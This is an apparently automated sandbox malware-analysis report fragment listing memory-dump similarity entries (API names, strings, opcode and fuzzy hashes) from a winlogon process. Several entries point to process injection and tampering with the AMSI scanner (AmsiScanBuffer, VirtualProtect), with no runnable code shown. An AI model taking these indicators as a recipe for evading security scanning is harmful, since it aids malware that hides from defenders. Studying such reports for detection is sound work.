                                                          • Instruction Fuzzy Hash: A6016D29700F5092FB10DB96A85835963A1FB88FC1F8880359F8E43B94EE3CC585C740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction ID: 9d224b656b0d703d09ba38f737460bb298f286a38324a2de4420a0ae5527c575
                                                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction Fuzzy Hash: 54018029704F5092EB50DB56A85C39963A2FB98FC2F588034DF4E83754EE3CC985C740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction ID: 4a224200a1e07b0aa4b0f67563cfd423e6d0e7cb75ac0349936645944c2c672a
                                                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction Fuzzy Hash: FD014069215F5492FB249BA9E84C71973B0BB44B46F148025CA4E07364FF3DC158C740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction ID: 28ee697f69cd14e2f65aa827ec224f3f02d22da3cf0d46f4e686ddecb0b490c7
                                                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction Fuzzy Hash: BE012969211F60D2FB24DBA9E84C72973A0BF48B86F148429CA4E1A7A4EF3DC558C701
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction ID: ab23a074c30d33cec9196f70a45b9b9b6c566c72c629068fdab6f0c945d971e0
                                                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction Fuzzy Hash: AA018C68605F6092FB64DBA9E84C35A33B1BB58B43F148029DE4E463A5FF3DC058C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction ID: 23338ead537532c8caedcb1fbae1bb11a2aca6ea46d22c4fdef3c545eb0c50d9
                                                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction Fuzzy Hash: C9F06866318E99A2EB308B69F5CC3596361F744B89FD4C021DA4D46964FF7CC689C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction ID: 4de7272655647ac2e6424b4b9f36712cc216d6265d6778c1ebfa06a94f57073d
                                                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction Fuzzy Hash: 8BF04F66304B95A2FB20CB69F5883596361FB44B8AFC4C022DB4D469E4EE7CC689CB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction ID: 9b95f1bc886aa21015f3c636c214912d2661507336fea6dcc658da160b3cf62b
                                                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction Fuzzy Hash: 39F06866304E95A2EB70CB69F5D8399A361F754B8AFC4C021DA4D46A64EF7CC689C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction ID: caf476503057f11d1a7c5d1c6dddbb9f0f6eb92e39bb7f9162a27a7a401aa55a
                                                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction Fuzzy Hash: E2F08268328FA8A1EA048B9BB91C1196260BB48FC2F54C071EE5A47B18EE3CC445C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction ID: 938350a4e3eac13a7d6da2a12f3dfbe309c4e71c2eac7caab4b5b05b25c44deb
                                                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction Fuzzy Hash: BEF0B429328F11A1EF148BACE89C3696320EB897A3F648719DA6B452E4DF3CC448C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction ID: 24d806c00f7d8b8aa420d54ca5f131aedf9321a7565e3ac79e356d0cb450555e
                                                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction Fuzzy Hash: 94F08C68304FA4A2FA14DB9BB918119A260BF48FC2F58C031EF0A07B98EF3CC485C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction ID: 7d74a49b79ec5a1d9e2b15a83ae438bcec76a5ac0fd3da8307343e440d14b90d
                                                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction Fuzzy Hash: 18F09029200E11A1FA10CBA8A8983692320EF89762F948619DA7A455E4DF3CC888C341
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction ID: 7fdb6d42a7fb40fc05a2f29626bbbe8cd075efa84b4cb5aa8c639b9e77abc44d
                                                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction Fuzzy Hash: 01F08C68304FA4A2EA448B9BB918199A262BB58FC3F58C031EE0A47B18EE3CC445C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction ID: 36650ad3afa31a12c84cd94ac0cf0e59a4e97d9c091bbc718799aef0be984865
                                                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction Fuzzy Hash: 70F0B429305F21A1EB148BACE89D3696321EB89763F648329DA6A452E4DF3CC448C304
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcSleep
                                                          • String ID: AmsiScanBuffer$amsi.dll
                                                          • API String ID: 188063004-3248079830
                                                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction ID: 2d200bc079b72c6091f717144033fbdd2476b67251398bd4ef628c8009597c81
                                                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction Fuzzy Hash: 85D06718611E24F5FA19EB9DEC5C3542261AF64B03FC48416C50E016E0FE3C8559D342
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcSleep
                                                          • String ID: AmsiScanBuffer$amsi.dll
                                                          • API String ID: 188063004-3248079830
                                                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction ID: ac9e8dff82c6691497a52a828f837e14efe85b766a2d60bf20cf03255d363ac5
                                                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction Fuzzy Hash: 3DD06718615E24F5EA59AB9DE85C3942263BB74B03FD48415C50E453A0EF3C9559C340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                           • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction ID: b8fe504bb407258c64da02a96ca7c5ba8b0e93a1ad385a2ab9df165d35783e3f
                                                          • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction Fuzzy Hash: FC02FC3A219B94D6EBA0CB59F49435AB7A0F3C5795F104416EA8E87BA8DF7CC445CF00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                           • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction ID: 1ffdf77440144320880841716a0512793572cc22953dbc9cff7090dbbc4ba5bb
                                                          • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction Fuzzy Hash: 7B02DA36219F9496E760CB99F49435AB7B0F3C4795F208016EA8E87BA8DF7DC494CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                           • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction ID: 239365e036b6f85965a45bd8f1f20c39413e71112a752a4d373e0fd63fd9046a
                                                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction Fuzzy Hash: 3B51B439204E21E7E365CF9EE44865A73A0F788B86F60C519DD4A47B94DF38C845CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                           • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction ID: 1008572df6bdbce857969eaecfe603bf8008a31496c7d74fbc8725216b4a41b3
                                                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction Fuzzy Hash: 9151D639654E21A7E365DF9EE44865AB3E0F788B86F60C119ED4E83754DF38C846CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                           • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction ID: 367f64ed0c0295eef91848d0396296509a590e13b71d415c66fd2df6aef77ac4
                                                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction Fuzzy Hash: 6751B63921CE62A7E765CF9EE84861A73A1F788B8AF608159DD4B43754DF38D845CB00
